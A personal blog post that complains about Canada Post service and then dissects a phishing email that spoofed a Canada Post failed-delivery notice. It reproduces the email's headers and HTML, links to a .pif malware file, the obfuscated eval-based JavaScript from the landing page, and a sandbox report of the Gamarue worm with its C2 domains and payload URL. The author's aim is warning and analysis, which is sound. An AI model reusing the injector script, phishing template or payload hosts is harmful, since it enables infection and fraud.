CanadaPost spam
The issues one has with CanadaPost are generally proportional to how much one must use it (like everything else, really). Since I have sold my car many years ago (for multiple reasons), I had to rely on their services perhaps disproportionately.
My first major issue with them happened when, again years ago, I started to subscribe to a DVD by mail rental service, zip.ca (bought out by Rogers, last I checked). My DVDs would come generally much later than they should have and never in a sealed envelope. In time, the delays started to accumulate until at one point I did not receive anything. I tried unsuccessfully to cancel my subscription and managed to do so only years later, at which point I was refunded part of my membership but had to pay for the DVDs I have never received. I filed a complaint with Canada Post; it never went anywhere.
A couple of years ago I had to send express mail to a lawyer’s office in Toronto. It took several days more than it should but it finally got there. A subsequent parcel was also unacceptably late and unlike the previous showed repeated delivery attempts. CanadaPost could not explain the numerous attempts and when I inquired what happened the tracking disappeared from the external website but not from their intranet, making troubleshooting with CSRs on the phone extremely time-consuming. It is also virtually impossible to submit and / or resolve complaints online, you need to talk to someone over the phone.
Recently, when I scheduled a pickup ($3.50) for a larger parcel, I had the delivery man come too early. When he came back he requested the order number. I went to look for it, it took me 10 minutes to find it. When I brought it back to him he could not enter it in his handheld device. I mentioned to him that at previous pickups this was not necessary and besides, he should have been able to pickup items without me being present. He claimed that it’s a “new system” as if it’s not his fault. I had scheduled 7 pickups before, one item was lost and have not wasted as much time as with the last one, which ended up costing more than all the previous instances combined.
In this context, I was quite surprised to receive what seemed to be a delivery notice for an item I did not recall ordering. Here’s the text (DON’T click!):
Canada Post ✆ tracking@canadapost.ca via utoronto.ca
Nov 24 (4 days ago)
to undisclosed recipients
Dear client,
We attempted to deliver your item on November 23, 2011 , 08:31 AM.
The delivery attempt failed because nobody was present at the shipping address, so this notification has been automatically sent.
You may arrange redelivery by visiting the link below or pick up the item at the Canada Post Office indicated on the receipt.If the package is not scheduled for redelivery or picked up within 48 hours, it will be returned to the sender.
Label/Receipt Number: RT117252788HK
Expected Delivery Date: November 23, 2011
Class: Package Services
Service(s): Delivery Confirmation
Status: eNotification sent
To check on the delivery status of your mailing or arrange redelivery please visit the following URL:
http://www.canadapost.ca/cpotools/apps/track/personal/findByTrackNumber?execution=e9s1?tracking=RT117252788HK [link to http://sdemirel.com/language/fb2.html]
To download the shipping receipt needed for redelivery arrangements, follow the link:
http://www.canadapost.ca/cpotools/apps/track/personal/findInvoiceByTrackingNumber?trk=RT117252788HK&ssid=828g7d23hsy7g3<{name}> [link to http://www.canadiancarboncapturealliance.com/pdf_capost_RT117252788HK.pif]
Thank you,
© 2011 Canada Post Corporation*** This is an automatically generated email, please do not reply ***
What’s weird here is that the actual tracking number was valid and unexpired, as shown above. Here’s the full code of the email:
Delivered-To: [me]@gmail.com
Received: by 10.142.66.3 with SMTP id o3cs147432wfa;
Thu, 24 Nov 2011 09:08:49 -0800 (PST)
Received: by 10.50.85.129 with SMTP id h1mr33790123igz.47.1322154517849;
Thu, 24 Nov 2011 09:08:37 -0800 (PST)
Return-Path: <tracking@canadapost.ca>
Received: from bureau67.ns.utoronto.ca (bureau67.ns.utoronto.ca. [128.100.132.164])
by mx.google.com with ESMTP id bb1si7373359icb.132.2011.11.24.09.08.36;
Thu, 24 Nov 2011 09:08:37 -0800 (PST)
Received-SPF: neutral (google.com: 128.100.132.164 is neither permitted nor denied by best guess record for domain of tracking@canadapost.ca) client-ip=128.100.132.164;
Authentication-Results: mx.google.com; spf=neutral (google.com: 128.100.132.164 is neither permitted nor denied by best guess record for domain of tracking@canadapost.ca) smtp.mail=tracking@canadapost.ca
Received: from bureau22.ns.utoronto.ca ([128.100.132.56]:42993 "EHLO
bureau22.ns.utoronto.ca" rhost-flags-OK-OK-OK-OK)
by bureau67.ns.utoronto.ca with ESMTP id S2327084Ab1KXRIg (ORCPT
<rfc822;[me]@utoronto.ca>); Thu, 24 Nov 2011 12:08:36 -0500
Received: from mail.copperskies.ca (mail.copperskies.ca [209.87.247.121])
by bureau22.ns.utoronto.ca (8.13.8/8.13.8) with ESMTP id pAOH8Zbj011646
for <[me]@utoronto.ca>; Thu, 24 Nov 2011 12:08:36 -0500
Message-Id: <201111241708.pAOH8Zbj011646@bureau22.ns.utoronto.ca>
Received: from ([127.0.0.1]) with MailEnable ESMTP; Thu, 24 Nov 2011 11:55:56 -0500
Reply-To: <tracking@canadapost.ca>
From: "Canada Post" <tracking@canadapost.ca>
Subject: Important Notice: Failed package delivery!
Date: Thu, 24 Nov 2011 12:15:40 -0500
MIME-Version: 1.0
Content-Type: text/html;
charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-ME-Bayesian: 0.000000
X-PMX-Version: 5.6.1.2065439, Antispam-Engine: 2.7.2.376379, Antispam-Data: 2011.11.24.165415
X-PMX-Spam: Gauge=XXXXXXIIIII, Probability=65%, Report='
URI_CONTAINS_PIF 5, CTYPE_JUST_HTML 0.848, X_MSMAIL_PRIORITY_HIGH 0.343, CHARSET_CYRILLIC_NO_CYRILLIC 0.05, BODYTEXTH_SIZE_10000_LESS 0, BODY_SIZE_1600_1699 0, BODY_SIZE_2000_LESS 0, BODY_SIZE_5000_LESS 0, BODY_SIZE_7000_LESS 0, CHARSET_W1251_NOT_CYRILLIC 0, DATE_TZ_NA 0, DATE_TZ_NEG_0500 0, FORGED_MUA_OUTLOOK 0, LINK_TO_IMAGE 0, MISSING_HEADERS 0, NO_MESSAGE_ID 0, PRIORITY_HIGH 0, TO_MALFORMED 0, USER_AGENT_OE 0, __ANY_URI 0, __CHARSET_IS_CP1251 0, __CP_URI_IN_BODY 0, __CT 0, __CTE 0, __CTYPE_HTML 0, __CTYPE_IS_HTML 0, __FRAUD_SUBJ_A 0, __HAS_HTML 0, __HAS_MSMAIL_PRI 0, __HAS_X_MAILER 0, __HAS_X_PRIORITY 0, __MIME_HTML 0, __MIME_HTML_ONLY 0, __MIME_VERSION 0, __OUTLOOK_MUA 0, __OUTLOOK_MUA_1 0, __PHISH_SPEAR_STRUCTURE_1 0, __PHISH_SPEAR_STRUCTURE_2 0, __PHISH_SPEAR_SUBJECT 0, __TAG_EXISTS_HTML 0, __URI_NO_MAILTO 0, __USER_AGENT_MS_GENERIC 0, __X_MSPRI_HI 0'
To: unlisted-recipients:; (no To-header on input)
<html>
<img border="0px" src="http://www.canadapost.ca//cpotools/mc/assets/images/structure/cpclogo_en.jpg" title="" alt="" /><br />
<br />
<span style="font-size: 12pt;"><span style="font-size: 12pt;"><p><br />
Dear client, <br>
<br>We attempted to deliver your item on November 23, 2011 , 08:31 AM.<br>The delivery attempt failed because nobody was present at the shipping address, so this notification has been automatically sent. <br>You may arrange redelivery by visiting the link below or pick up the item at the Canada Post Office indicated on the receipt. </p>
If the package is not scheduled for redelivery or picked up within 48 hours, it will be returned to the sender.
<p>Label/Receipt Number: RT117252788HK<br />
Expected Delivery Date: November 23, 2011<br />
Class: Package Services<br />
Service(s): Delivery Confirmation<br />
Status: eNotification sent <br><br>To check on the delivery status of your mailing or arrange redelivery please visit the following URL: <br><a href="http://sdemirel.com/language/fb2.html">http://www.canadapost.ca/cpotools/apps/track/personal/findByTrackNumber?execution=e9s1?tracking=RT117252788HK</a><br><br>To download the shipping receipt needed for redelivery arrangements, follow the link:<br> <a href="http://www.canadiancarboncapturealliance.com/pdf_capost_RT117252788HK.pif">http://www.canadapost.ca/cpotools/apps/track/personal/findInvoiceByTrackingNumber?trk=RT117252788HK&ssid=828g7d23hsy7g3<{name}></a><br>
<br>Thank you,
<br>© 2011 Canada Post Corporation
<p>*** This is an automatically generated email, please do not reply ***</p>
<p><br />
</p>
</html>
The email was sent to my U of T email and then forwarded to a gmail address. “Canadian Capture Alliance” is probably a site that’s been hacked into and it carries a malware payload as a .pif file, which is executable under Windows. It was registered by Pat Bachand with Canaca-com Inc. in Toronto (905-275-0723) via Tucows. Sdemirel.com was registered by one Serkan Demirel ia DomainControl.com but it could very well be hacked as well without the rightful owner’s knowledge.
Here’s what the first malicious link contains in the html file:
<meta http-equiv="refresh" content="3;url=http://www.canadapost.ca/cpotools/apps/track/personal/findByTrackNumber?execution=e9s1">
<script>a=(document.getElementsByTagName+'').substr(1,4);if((a=="func")||(a=="unct")){ss="";s=String;e=eval;t='g';}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.bt3223='tb4etew';c="createTextNode";if('tb4etew'==={}.bt3223)a=document[c]('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n="4.5g4.5g52.5g51g16g20g50g55.5g49.5g58.5g54.5g50.5g55g58g23g51.5g50.5g58g34.5g54g50.5g54.5g50.5g55g58g57.5g33g60.5g42g48.5g51.5g39g48.5g54.5g50.5g20g19.5g49g55.5g50g60.5g19.5g20.5g45.5g24g46.5g20.5g61.5g4.5g4.5g4.5g52.5g51g57g48.5g54.5g50.5g57g20g20.5g29.5g4.5g4.5g62.5g16g50.5g54g57.5g50.5g16g61.5g4.5g4.5g4.5g50g55.5g49.5g58.5g54.5g50.5g55g58g23g59.5g57g52.5g58g50.5g20g17g30g52.5g51g57g48.5g54.5g50.5g16g57.5g57g49.5g30.5g19.5g52g58g58g56g29g23.5g23.5g28g27.5g23g25g26.5g24.5g23g24.5g26.5g26g23g24.5g26.5g23.5g54.5g48.5g52.5g55g23g56g52g56g31.5g56g48.5g51.5g50.5g30.5g27g24g28.5g24g50.5g50g26.5g27g25g48.5g50.5g48.5g24g26g48.5g25.5g19.5g16g59.5g52.5g50g58g52g30.5g19.5g24.5g24g19.5g16g52g50.5g52.5g51.5g52g58g30.5g19.5g24.5g24g19.5g16g57.5g58g60.5g54g50.5g30.5g19.5g59g52.5g57.5g52.5g49g52.5g54g52.5g58g60.5g29g52g52.5g50g50g50.5g55g29.5g56g55.5g57.5g52.5g58g52.5g55.5g55g29g48.5g49g57.5g55.5g54g58.5g58g50.5g29.5g54g50.5g51g58g29g24g29.5g58g55.5g56g29g24g29.5g19.5g31g30g23.5g52.5g51g57g48.5g54.5g50.5g31g17g20.5g29.5g4.5g4.5g62.5g4.5g4.5g51g58.5g55g49.5g58g52.5g55.5g55g16g52.5g51g57g48.5g54.5g50.5g57g20g20.5g61.5g4.5g4.5g4.5g59g48.5g57g16g51g16g30.5g16g50g55.5g49.5g58.5g54.5g50.5g55g58g23g49.5g57g50.5g48.5g58g50.5g34.5g54g50.5g54.5g50.5g55g58g20g19.5g52.5g51g57g48.5g54.5g50.5g19.5g20.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g57.5g57g49.5g19.5g22g19.5g52g58g58g56g29g23.5g23.5g28g27.5g23g25g26.5g24.5g23g24.5g26.5g26g23g24.5g26.5g23.5g54.5g48.5g52.5g55g23g56g52g56g31.5g56g48.5g51.5g50.5g30.5g27g24g28.5g24g50.5g50g26.5g27g25g48.5g50.5g48.5g24g26g48.5g25.5g19.5g20.5g29.5g51g23g57.5g58g60.5g54g50.5g23g59g52.5g57.5g52.5g49g52.5g54g52.5g58g60.5g30.5g19.5g52g52.5g50g50g50.5g55g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g56g55.5g57.5g52.5g58g52.5g55.5g55g30.5g19.5g48.5g49g57.5g55.5g54g58.5g58g50.5g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g54g50.5g51g58g30.5g19.5g24g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g58g55.5g56g30.5g19.5g24g19.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g59.5g52.5g50g58g52g19.5g22g19.5g24.5g24g19.5g20.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g52g50.5g52.5g51.5g52g58g19.5g22g19.5g24.5g24g19.5g20.5g29.5g4.5g4.5g4.5g50g55.5g49.5g58.5g54.5g50.5g55g58g23g51.5g50.5g58g34.5g54g50.5g54.5g50.5g55g58g57.5g33g60.5g42g48.5g51.5g39g48.5g54.5g50.5g20g19.5g49g55.5g50g60.5g19.5g20.5g45.5g24g46.5g23g48.5g56g56g50.5g55g50g33.5g52g52.5g54g50g20g51g20.5g29.5g4.5g4.5g62.5";n=n["split"](t);for(i=0;i!=n.length;i++)ss+=s.fromCharCode(-h*e("n"+"["+"i"+"]"));zx=ss;if(a.data==a.nodeValue)e(zx);</script>
Simply wgetting the .pif file caused a warning from MS security to appear:
Even after renaming it with a .txt extension it continued to be “Suspended”.
In any event, days after having received the email and having called CanadaPost the offending files are still available and have not been removed. We will continue to look into this matter. Here’s what Gamarue does according to MalwareSurvival:
Payload:
- Uniform traffic ticket.zip
- Uniform traffic ticket.exe
The UniforTr.exe launches and injects into SVCHost.exe
- Analysis Reason: Started by svchost.exe
Filename: uniform tr.exe
MD5: cacc96e054cc92f0a506a7cd2130b569
SHA-1: 5152877f6de96780ac18992acb2ca40c40e2dfe7
File Size: 28160 Bytes
Command Line: ”C:\uniform tr.exe”
Process-status at analysis end: alive
Exit Code: 0Malware Detections:
- Worm:Win32/Gamarue.B [Microsoft]
- Troj/Bredo-LQ
Files Deleted
- C:\uniform tr.exe
Files Created:
- C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\0006a4fd.tmp
- C:\DOCUME~1\ALLUSE~1\LOCALS~1\Temp\6e4cfff9000691b3.exe
- C:\Documents and Settings\All Users\Local Settings
- C:\Documents and Settings\All Users\Local Settings\Temp
Process Created:
- C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\0006a4fd.tmp
DNS Traffic:
- 91.221.98.29
- 188.247.135.83
HTTP Traffic:
- From MS:1030 to 188.247.135.83:80 – [mamtumbochka766.ru]
Request: POST /and/image.php
Response: 200 “OK”
From MS:1032 to 91.221.98.29:80 – [91.221.98.29] <— Found TR/Crypt.XPACK.Gen
Request: GET /531-01.exe
Response: 200 “OK”
From MS:1034 to 188.247.135.83:80 – [mamtumbochka766.ru]
Request: POST /and/image.php
Response: 200 “OK”Phones Home:
- Unknown UDP Traffic: from MS:1031 to 8.8.4.4:53
State: Normal establishment and termination – Transferred outbound Bytes: 30 – Transferred inbound Bytes: 105- Unknown TCP Traffic: from MS:1028 to 8.8.4.4:53
This spam message managed to get through my spam filters and that’s unusual. It seems that I lost my precaution long ago. Hopefully I’m not infected.
Sources / More info: RT117252788HK, Gamarue.B, malwaresurv, Downloader.Dromedan
Comments